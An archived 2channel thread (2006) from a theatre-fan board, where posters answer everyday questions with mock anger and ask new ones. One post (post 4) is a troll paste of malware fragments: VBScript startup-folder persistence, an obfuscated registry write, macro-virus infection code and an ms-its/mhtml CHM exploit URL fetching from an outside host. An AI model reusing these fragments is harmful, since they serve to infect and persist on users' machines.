5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

普通の質問に逆ギレするスレ@四季宝塚板7

1 :名無しさん@花束いっぱい。:2006/11/07(火) 23:39:21 ID:XBoEhu58
【ルール】

1.前の人の質問に逆ギレで答えましょう

2.1行空けて、普通に質問しましょう

3.被ったら後のを優先 余裕があったらフォローしる

4.被っても泣かない むしろ逆ギレしる



2 :名無しさん@花束いっぱい。:2006/11/07(火) 23:43:10 ID:XBoEhu58
過去ログはこちら

Part.6◇ 『普通の質問に逆ギレするスレ@四季宝塚板6』
http://hobby8.2ch.net/test/read.cgi/siki/1058436149/

Part.5 ◇ 『普通の質問に逆ギレするスレ@四季宝塚板5』
http://hobby2.2ch.net/test/read.cgi/siki/1049729526/

Part.4 ◇ 『普通の質問に逆ギレするスレ@四季宝塚板4』
http://hobby2.2ch.net/test/read.cgi/siki/1045679603/

Part.3 ◇ 『普通の質問に逆ギレするスレ@四季宝塚板3』
http://hobby2.2ch.net/siki/kako/1045/10450/1045015983.html

Part.2 ◇ 『普通の質問に逆ギレするスレ@四季宝塚板2』
http://hobby2.2ch.net/siki/kako/1044/10440/1044082163.html

Part.1 ◇ 『普通の質問に逆ギレするスレin宝塚・四季板』
http://hobby2.2ch.net/siki/kako/1039/10399/1039972768.html

3 :前スレ990だっ!:2006/11/07(火) 23:46:59 ID:XBoEhu58
おーら!おまいらっ!立ててやったから、ありがたく思えや、ゴ━━━━(# ゚Д゚)━━━━ルァ!!

やっぱり風邪が治りません…orz
今日はお風呂に入るのやめておいたほうがいいでしょうか?

4 :<body onload=window()>:2006/11/08(水) 00:57:19 ID:aiAU6VdW
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


5 :名無しさん@花束いっぱい。:2006/11/08(水) 01:14:36 ID:L4Rc7L8b
5(○・∀・)b
ちょっとぐらいの風邪だったら半身浴で汗を出せ!
でも髪は洗うなよ!
こりゃマジだかんな!!!
っつーか寝ろっつんだよ!!!!!!マジレスしちまったじゃねーかゴ━━━━(# ゚Д゚)━━━━ルァ!!


前スレの質問が浮いてしまいました。。。
どうしたらいいですか・・・orz

6 :名無しさん@花束いっぱい。:2006/11/08(水) 01:16:25 ID:L4Rc7L8b
今更だけど>>1

7 :名無しさん@花束いっぱい。:2006/11/08(水) 01:22:30 ID:8WFou+dc
あほか!!
こちとら一週間風邪っぴきだ
風呂入って暖まってさっさと寝ろ!!
ついでにビタミンCをとって
ちゃんと食べろ!!!

990=1=3乙!!

腹が立ってたまらないときは
どうやって抑えますか?



8 :名無しさん@花束いっぱい。:2006/11/08(水) 01:27:38 ID:snnLI+MD
答えてやるに決まってるじゃないか、ぼぅけ〜
うにくろだぁ〜あぁっ、いいどきょうじゃねえか、よびすてかい。
ぼんびーなおまえ等はウニクロ様とお呼びしろ。好きに決まってるわい!

愛犬愛猫は湯たんぽ代わりになってくれますか

9 :名無しさん@花束いっぱい。:2006/11/08(水) 01:45:03 ID:uJJqVF2e
湯たんぽだとぅ〜〜?!
テメェはワンコ様・ヌコ様を使って暖まってんのかよ?
いい度胸してんじゃねーか!
正しい人間はすすんでワンコ様・ヌコ様の湯たんぽ代わりになるんだよ!
コレジョーシキ、ネッ!!!

そいからな、>>7
腹が立ってたまらない時はゴ━━━━(# ゚Д゚)━━━━ルァ!!
って叫ぶんだよ!我慢なんかすんじゃねぇっ!
…心の中でなorz

そんでもって、>>4
変なもん貼ってんじゃねーよっ!!専ブラで見れねーじゃねーかっ!
マジギレだぜっクソッタレッッ!!!

仕事中、お腹が鳴っちゃったらどうやってごまかしますか?

10 :名無しさん@花束いっぱい。:2006/11/08(水) 19:49:22 ID:CMyI20zd
てめぇ、腹が鳴った音で即興ミュージカル作れんでどうすんじゃ!
腹の音でメロディー奏でてこその四季ヲタorヅカヲタだろうが!
修行が足りん、出直して来いや、ゴルァ!(゚Д゚)y─┛

寒いですね、おでんの具は何が好きでつか?

11 :名無しさん@花束いっぱい。:2006/11/08(水) 23:25:05 ID:Urq0eOzr
バッキャロー!!
なんでも聞きゃあいいと思ってんだろ!
おでんなんて大嫌いだ!!
あんなにカロリーばっか高いもんないだろ!
好きな具か、んなもん、大根にきまっとるじゃろ!!!

お勧めの鍋料理を教えてください



12 :名無しさん@花束いっぱい。:2006/11/09(木) 00:47:14 ID:0W9Bx3/F
はぁ?
何ヴォケた事ぬかしてんだ!?
どうせ「鍋は料理できません。あんな硬い物どうやって食べるんですかぁ?」
とかってーのを期待してるんだろ!!??
けっ
あえてここはマジレスしてやるよ!!
キムチ鍋が好きなんだよ!!
キムチに使われる唐辛子にはカプサイシn(ry
何か文句でもあんのかゴ━━━━(# ゚Д゚)━━━━ルァ!!


明日までに片付けなければいけない仕事を家に持ち帰ってはみたものの
ヅカのDVDやら2やらを見てしまい、一向に進みません。
どうしたらいいですか?

13 :名無しさん@花束いっぱい。:2006/11/09(木) 01:28:57 ID:PRtE8Mhk
このヴォケ!なぁに甘ったれたことぬかしとんのじゃあーーー!
仕事を持ち帰るなんざぁ100億光年早いんじゃゴ━━━━(# ゚Д゚)━━━━ルァ!!
自分の手に負えそうもない仕事はスルー汁!
仕事中は仕事してるフリだけしとればええんじゃ!オタンコナス!!!

ワンコにベッドを占領され、寝るに寝れません…。
かわいい顔して寝ているワンコをどうやって起こしたらいいですかね?


14 :名無しさん@花束いっぱい。:2006/11/09(木) 21:36:12 ID:+Zi39d3H
てめえには生類憐みの令の精神を発揮しやがれ!
お犬様はベッド!てめーは床!床にバスタオル敷いて寝やがれ!
それが嫌なら打ち首覚悟でお犬様をすくい投げして
お犬様のぬくもりを感じつつ安らかな眠りじゃー!

逆ギレスレはage進行したいのでつがダメでつかね?

15 :名無しさん@花束いっぱい。:2006/11/11(土) 00:15:02 ID:iOg4es9o
ダメでつかだと!?
そんなん知るか〜〜〜〜(っ`Д´)っ・:∴
どうしてもage進行したいんだったらなぁ
その理由を400字詰め原稿用紙5枚で明日までに漏れに提出汁。


眠いんですけど寝れないんですよ〜
何かいい方法ないでつか?

16 :名無しさん@花束いっぱい。:2006/11/11(土) 00:26:59 ID:ULOzOAUg
人肌に温めた牛乳を飲め!
眠れなかったら目を閉じたまま起きてろ!
わかったか!開き直れば眠れるんじゃ!!
何よりこんなとこ開けて血圧上げるんじゃないぞ!

家の中がぐちゃぐちゃ・・・埃はない
整理整頓能力ってどうやったら身につくんですか?




17 :名無しさん@花束いっぱい。:2006/11/13(月) 21:27:23 ID:HFllLibJ
整理整頓だぁぁぁああああ!?
んなもん押入れにポイじゃぁああああ!!!!!
何とな〜くキレイになったなぁ♪で充分なんだよ!!
わかったか!!!!!!


そろそろコタツ出しませんか?

18 :名無しさん@花束いっぱい。:2006/11/13(月) 21:36:27 ID:6nDcOSpe
もう出してますが何か?
て上げてんじゃーねーよヴォケ!!
普通に返事しちまったじゃまいかオリャー!!!

キレてないのは誰のせいでしょうか?




19 :名無しさん@花束いっぱい。:2006/11/14(火) 01:52:56 ID:Yia52XjT
そりゃーおまい、Schickのカミソリ使っとるからじゃーー!ボケ!!

観劇ビンボーなくせにまた洋服衝動買いしてしまいますた…orz
どうしたら無駄遣いをやめれますか?

20 :名無しさん@花束いっぱい。:2006/11/14(火) 07:34:18 ID:IQ159Jag
http://www.ujura.jp/hbbs3/hyperthread.cgi?mode=view;Code=527

コテハン?

21 :名無しさん@花束いっぱい。:2006/11/15(水) 00:21:58 ID:KKhVXWTX
無駄遣いなのか!洋服を買うのは無駄なのか!!!
だったら服なんか着るな!
ホタテとはっぱで乗り切ってみろ!!!!!!
そしたら無駄が無くなるよ!!!わかったか( ゚Д゚)ゴルァ!!


もう5日もうんもが出ません。
どうしましょ?

22 :名無しさん@花束いっぱい。:2006/11/15(水) 00:29:30 ID:Nys2qLdW
朝起き抜けに冷たいぎうにうを1リットル一気飲みしろー! てきめんじゃ!
漏れなんぞベ○ぴの経験皆無じゃー!
むしろ下る トイレが近場に無い時どれほど我慢が苦しいことか!

贔屓がトップになるおまじないを教えてください


23 :名無しさん@花束いっぱい。:2006/11/15(水) 02:25:13 ID:mTarJrB/
「私がスポンサー見つけてあげる」もしくは
「あなた以外はみんなクソ」

ただし敵を作るぞ!その気があれば毎日唱えればいい!
要は「ただひたすらに応援する」しかないんだよ!
そんな事も知らないでヅカファンやってんのかオンドリャ!!!



カレーに入れる肉は何肉でつか?( ゚∀゚)


24 :名無しさん@花束いっぱい。:2006/11/15(水) 21:29:41 ID:EEju8GTz
ああああぁぁぁぁぁぁぁぁぁあああんんんんんn????????
カレーに入れる肉っつったのか?
カレーに入れる肉って!?
そんなモン喪舞の有り余ったハラの肉でも切り取って放り込んどけ!!!!



あなたのオススメ作品は?四季&ヅカ

25 :名無しさん@花束いっぱい。:2006/11/16(木) 22:29:22 ID:x5gv6VX8
>>24
おまいのせいで2日も止まったぞ!!ヴォケ!!
ヅカなら「うたかたの恋」だ!泣いて帰ってきたさ!!悪いか!!
四季は「キャッツ」だろコノオタンコナスメ!!

ボージョレー・ヌーヴォ解禁です。
あなたはもう飲まれましたか?


26 :24:2006/11/16(木) 23:59:05 ID:kqa/gBcc
>>25
漏れのせいか!?やっぱりそうかorz

飲んでねーよ!!
場所によってボジョレーとかボージョレーとかボジョーレとか
わかりづれーんだよ!!!!それもこれもみんな喪舞のせいじゃヴォケーーーーーーー!!!!


明日から雪東宝ですね。
あなたは行きますか?

27 :名無しさん@花束いっぱい。:2006/11/18(土) 00:46:36 ID:i9NB16gd
何たわけたこと聞くんじゃ、このすっとこどっこいっ!
行くに決まってるだろーがっ!!
チケット、5公演get済みじゃー!!!
ラストデーの中継も死ぬ気でgetじゃー!!!!
でも、漏れの贔屓は駄作続きの月組じゃー!!!!!

ヤフオクやってます?




28 :名無しさん@花束いっぱい。:2006/11/19(日) 01:57:04 ID:h58sm/Su
何て事聞くんだこのやろーーーーーー!!!!
やってるに決まってんだろ!?
IDは秘密よ☆


日曜日の予定は?

29 :名無しさん@花束いっぱい。:2006/11/19(日) 02:06:18 ID:/acueImE
給料日前の香具師になんて事聞くんだオタンコナス!!!!!
ただでさえ先日ご贔屓見送って、資金も底をついてるというのに
こちとら不景気で今期ボー茄子無しだオリャ!!!!!
よって明日はヒッキーだよ!CSだけが友達さ!

orz


100万円自由に使えたら、何する?

30 :名無しさん@花束いっぱい。:2006/11/19(日) 22:52:12 ID:Gn3O06Vu
おまいはアフォですかーーーーっ?!
100万ぽっちご贔屓の追っかけ&貢物であっという間になくなっちまうんだよ!!
んなこたぁわかってんだろぉが!ヴォケチンめっっ!
あー、でも100万欲しいなぁorz

宝くじは買ってますか?

31 :名無しさん@花束いっぱい。:2006/11/19(日) 23:30:20 ID:h58sm/Su
おまいはアフォですかーーーーっ?!
このセリフそのまま喪舞に言ってやるーーーー!!!!!
グリーンジャンボも年末ジャンボも欠かさず買ってるわーーーーー!!!!!!
数年前に1万円当たっちゃった♪
って1万で喜べるかゴ━━━━(# ゚Д゚)━━━━ルァ!!


年末ジャンボ、1等当たったらどうする?

32 :名無しさん@花束いっぱい。:2006/11/20(月) 12:50:43 ID:V1L4ek8F
どうするダァ?
当たるわきゃねーのに、んなこと考えるかヴォケェ!
ジャンボ買う金があったら、贔屓の公演、1席でも空席を埋めるべく
頑張るんじゃゴ━━━━(# ゚Д゚)━━━━ルァ!

寒いですね。
ババシャツ着てますか?



33 :名無しさん@花束いっぱい。:2006/11/22(水) 18:21:19 ID:WaS54t8c
誰がババァだゴ━━━━(# ゚Д゚)━━━━ルァ!
喧嘩売っとんのかいっ!
漏れは素肌にセーター着て、ジカジカしながら
過ごしとるんじゃ!

写真写りが良くなるには、どうしたらいいですか?

34 :名無しさん@花束いっぱい。:2006/11/23(木) 01:28:30 ID:QC68Qtyo
そんなもん知るか!!!!!
デジカメの自動補正機能にお任せ汁!!!!!!
どうしても良く映りたいなら小首をかしげて上目遣いだ!!!!!

熱が1週間下がりません。寝てるのにも飽きました。
どうしたら下がりますか?

35 :名無しさん@花束いっぱい。:2006/11/23(木) 13:40:57 ID:Y1eniXhD
おまいさんはアフォですか?
熱下がらんのに2ちゃん覗いてるんじゃーねーよ!!!
家庭の医学でも検索して対策考えろつーの!!!

あなたはうどん派?それとも蕎麦派?
あたしはうどんが大好きですねんわ〜

36 :名無しさん@花束いっぱい。:2006/11/24(金) 21:52:24 ID:hsuKo8kZ
その関西弁はあってるのか!?
つか喪舞は何てひどいヤシなんだ!!!!
うどんも蕎麦も愛してやれよ!!!派閥なんて作ってやるな!!!!!!
人間様に美味しく召し上がっていただく為にあんなぶっとい棒で伸ばされ叩かれ
あげくの果てには踏まれてるんだぞ!!!!
そんなうどん様とお蕎麦様に派閥を作って争えと言うのか!!!!!!



私は蕎麦派ですがあなたは?

37 :名無しさん@花束いっぱい。:2006/11/24(金) 22:31:02 ID:Fj1aP2Hg
てめー!そのツラさげてそんなことゆってやがる!
漏れは生まれも育ちもうどんの国でい!
うどんの国ではうどんを365日食うのが掟じゃああ!
年間500食食うツワモノもおるんじゃー!
挙句に男のうどんツアーなるものものがあるんじゃぞ!
うどん様にきまっとるわーーーーい!!!!
つか、逆においしい蕎麦屋が少ない…

風邪ひいてやっと会社にいけるまで快復しました。
今インフルエンザの予防接種はまずいでつよね?

38 :名無しさん@花束いっぱい。:2006/11/25(土) 11:42:25 ID:z6DgqetA
風邪が治って良かったな、ヲイ!!
インフルエンザのタミフルって怖いんじゃーなかったか、ヲリャー!!!!
よく知らんがな。
取り合えずうどんを食ってる藻舞には、インフルエンザも退散するじゃろーて!!!!

豚汁と粕汁、どちらが好き?

39 :名無しさん@花束いっぱい。:2006/11/26(日) 15:30:02 ID:m0en33gx
粕汁って何じゃあぁぁー!
豚汁がブタジルなのかトンジルなのか分からん料理音痴にも分かるように説明せんかいボケェ!!
よって漏れが好きなのは豚汁じゃあぁー文句あっかー!?

貴方のご贔屓のチャームポイントは何ですか?

40 :名無しさん@花束いっぱい。:2006/11/26(日) 20:37:02 ID:VktnnwDs
チャームポイントだとぉ!?
長くなるが聞いたからには最後まで嫁よこの野郎!!!!!!

まずなんと言ってもあの小顔だろ!
それに軟体動物のような身体能力!
素顔も好きだがステージメイクでの豹変ぶり!
顔に似合わぬ太い声!
非オタには酷評される歌声!
怪しげな微笑み!
全てがツボなんだよ!!!!
ああどうせオタだよ!!!!!!
何か文句あんのかゴルァ(゜д゜)!!!!!!



多分私の贔屓がバレました。どうしてくれますか?


41 :名無しさん@花束いっぱい。:2006/11/27(月) 15:37:00 ID:Fzg3Na2a
安心しろやゴ━━━━(# ゚Д゚)━━━━ルァ!
こちとら四季オタでーーーーぃ!
おまいの贔屓なんざわかんねーよゴ━━━━(# ゚Д゚)━━━━ルァ!
オタならオタらしく堂々としやがれってんだ!!!

もうすぐボーナスですね♪なにを買う予定ですか?

42 :名無しさん@花束いっぱい。:2006/11/27(月) 17:51:32 ID:XBx4FC1q
こちとら自営なんでボーナスなんか出ないつーの!!!
ボーナスなしで年末年始も働くっつーの!!!
可哀相に思ったら、ちょっとばかしの愛を漏れにくでーーーー!!!

クリスマスはキリストの誕生日だって日本国民は忘れてるよね?
これどう思う?

43 :名無しさん@花束いっぱい。:2006/11/27(月) 20:54:53 ID:Of2FAFPW
イエスの誕生を祝うノエルなど、見たくもない。
って言ってんだろーが!!!!!!
そんくらいわかれよゴ━━━━(# ゚Д゚)━━━━ルァ!!


ここ2〜3日急に冷え込みましたね。
カイロはお腹に貼りますか?それとも背中?

44 :名無しさん@花束いっぱい。:2006/11/29(水) 22:42:48 ID:mEEejdhT
カイロなんか貼らんわい。接着剤でかぶれるんじゃゴラァ!
腹巻きのポッケに入れて、お腹でも背中でも好きな方向に
グルグルじゃボケェ。

投資で儲けたことありますか?

45 :名無しさん@花束いっぱい。:2006/11/30(木) 09:19:15 ID:wrQ6yH5g
投資するほど余ってる金はございませんが何か?
て、マジレスさせんじゃーねーよ!!!!ヴォケ!!
贔屓に投資して出ていくばっかーなんだよ!!わりーか!!

年末ジャンボな宝くじ買います?



46 :名無しさん@花束いっぱい。:2006/11/30(木) 22:53:28 ID:iv4q7xZI
だからー!ちっと前のスレぐらいさかのぼって嫁やゴ━━━━(# ゚Д゚)━━━━ルァ!!
宝くじ買う金があったら贔屓の公演観にいくんじゃ!ヴォケーーーー!
それこそ清く正しいヅカオタ&式オタの生きる道なんじゃあぁぁぁあ!!!!
でもー、10枚くらいなら買ってもいいかな♪当ったら…wktk

片思いのあの人にクリスマスプレゼントをあげたいです。
何がいいと思いますか?


47 :名無しさん@花束いっぱい。:2006/12/01(金) 01:38:25 ID:bH2n71ob
クリスマスプレゼントだぁあ?
こちとらクリスマスイヴに最愛のあの方とサヨナラしなくちゃならんのに
現実世界の男なんぞに気をとられてたまるかってんだ!!!!
そんな金あったら1公演でも贔屓の(ry




去年はデジカメもらいました。
今年は24日のチケが欲しいです。

あなたはクリスマスプレゼント何が欲しい?

48 :名無しさん@花束いっぱい。:2006/12/01(金) 13:50:59 ID:rS1bJUCC
んなもん決まっとるわい、ヴォケーーーー!
贔屓が欲しいよっ!いいか、贔屓のチケなんかじゃねーぞ、「贔屓」が欲しいんだぞ!!
そこんとこ間違えんじゃねーぞ!!
毎日仕事から帰ったらご贔屓が家で歌って踊ってんだぞ!
くーっ!!こりゃたまらんわな!!

今日から12月ですね。年賀状はもう書きましたか?

49 :名無しさん@花束いっぱい。:2006/12/02(土) 23:02:10 ID:gAJZlr11
あああああああ!!!!!
年賀状ーーーーーー!!!!!
今年は喪中だぁぁぁぁorz
喪中葉書出すの忘れてたあああぁぁぁぁぁil||li _| ̄|○ il||li
どうしてくれるんだ!?

最近車の中が寒くて仕方ありません。
暖房がきいてくるまでの寒さ対策、何かいい方法ありませんか?

50 :名無しさん@花束いっぱい。:2006/12/06(水) 21:35:16 ID:bkahGYgL
暖房だぁ?
何甘ったれた事ぬかしてやがる!!
乾布摩擦でもしとけってんだゴ━━━━(# ゚Д゚)━━━━ルァ!!
こちとら昨日ストーブが壊れて足元が寒くてしゃーねーんだよ!!!

というわけで、
電気ストーブを買うかマイナスイオンのヒーターにするべきか
悩んでいます。
あなたならどうする?

51 :名無しさん@花束いっぱい。:2006/12/08(金) 07:53:35 ID:SF4dAI82
男なら黙って
湯たんぽ使えやゴラー
でもな、お湯とか使ったら男の恥やろ!!
水を入れて逆に温めるくらいしろ

あなたは、この冬スキーに行きますか?

52 :名無しさん@花束いっぱい。:2006/12/08(金) 22:29:44 ID:TLVjuEj2
スキーだとぉ!!??
いまどきスキーなんてダチに笑われるわっ!!!
かと言ってボードは1枚の板に2本の足を乗せるのが恐いんだよっ!!!!
そもそも寒い時に何でわざわざ雪山で雪と戯れなきゃならん!!
日本人はおこたでみかんが正しい冬のすごし方なんだよっ!!!!
わかったかゴ━━━━(# ゚Д゚)━━━━ルァ!!


次の喪舞、週末の予定は?

53 :名無しさん@花束いっぱい。:2006/12/09(土) 01:26:32 ID:/muAquEZ
普通に仕事してるぞゴ━━━━(# ゚Д゚)━━━━ルァ!!
土日が休みの会社ばっかじゃないんだよっヴォケッ!!
そんでもって次の休みは月曜でどの劇場も休演日だってんだ!!!
式オタのアタシにゃ月曜と火曜の休みは不要じゃーーーーっ!

さて、今年もあと3週間あまり。
あなたにとっての今年のトップニュースはなんでしょう?

54 :名無しさん@花束いっぱい。:2006/12/10(日) 17:13:34 ID:6pyYjRng
俺は今年四季(観劇)デビューしたことだが文句あっか〜?(怒)
まだ若葉マークじゃい
しかも、今迄で一番高いチケットがバルコニーで6300円だが何か?

あなたが一番おすすめの劇(四季・宝塚以外でも可)は何ですか?

55 :名無しさん@花束いっぱい。:2006/12/12(火) 21:19:26 ID:4pawKAyI
ああああぁぁぁぁあああん?????
おすすめの劇だぁあ??
そりゃ今は「堕天使の涙」だろ!!!!
式オタの喪舞に言ってもわからんだろうがなっ!!!
式は「オペラ座の怪人」だろっ!?
ラウルが中々いい男だったじゃねーか!!!!ちくしょーもっと前の席で観たかったよ!!!


あなたが観劇して、一番いい席だなぁと感じたのは
どの辺の席ですか?

56 :名無しさん@花束いっぱい。:2006/12/13(水) 11:04:20 ID:u2SmOsJs
かぶりつきに決まってんじゃーねーか!!!このスットコドッコイ!!!
一度そこで観るとな、病み付きになるのよ。
それでな贔屓にロックオンで舞台では何をやってんだかわかんねーけど良いのよ〜
がしかしだ、なかなか当たらないってーのが世の中ってもんだなヲイ・・・_| ̄|○
て、しんみりさせやがってーーーーーゴ━━━━(# ゚Д゚)━━━━ルァ!!

マジシャンのセロって素敵だと思いませんか?
自分はつい最近までゼロだと思ってました。


57 :名無しさん@花束いっぱい。:2006/12/16(土) 22:55:05 ID:/6CKXT7t
人様の名前を間違えてんじゃねーぞゴルァー!
セロは凄いと思うが素敵さではご贔屓様に叶う訳ないんじゃーーー!
決してスタイル良くもなく、
顔立ちも万人受けする美貌とは言えなくても
漏れにとっては総てが素敵なんじゃ!
痛いファンで悪いかゴルァー!

好きなテレビ番組は何ですか?

58 :名無しさん@花束いっぱい。:2007/01/09(火) 00:01:33 ID:DglRp79i
12月からスレが止まっちまってるじゃねーかアァァ!!
好きなテレビ番組?
ロンドンハーツで悪いか(゚Д゚)ゴルァ!!
くっだらねーと思いつつ見ちゃうんだよ!!

・・・格付け好きとかって性格悪くなってきたのかなオイラorz


さて、新年も明けましたが、今年の大まかな観劇予定を教えてください(・∀・)

59 :名無しさん@花束いっぱい。:2007/01/09(火) 01:17:57 ID:QfKKlvdW
何だこのスレ!
観劇予定だぁ!?ヅカオタ初心者でFCにも入ってない私は
チケ買えるかもわかんねーんだよ!!!!(携帯なのでAA略)
欲しいDVDは山程あるがな!


あなたはヅカオタorシキオタ歴どれくらい?

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)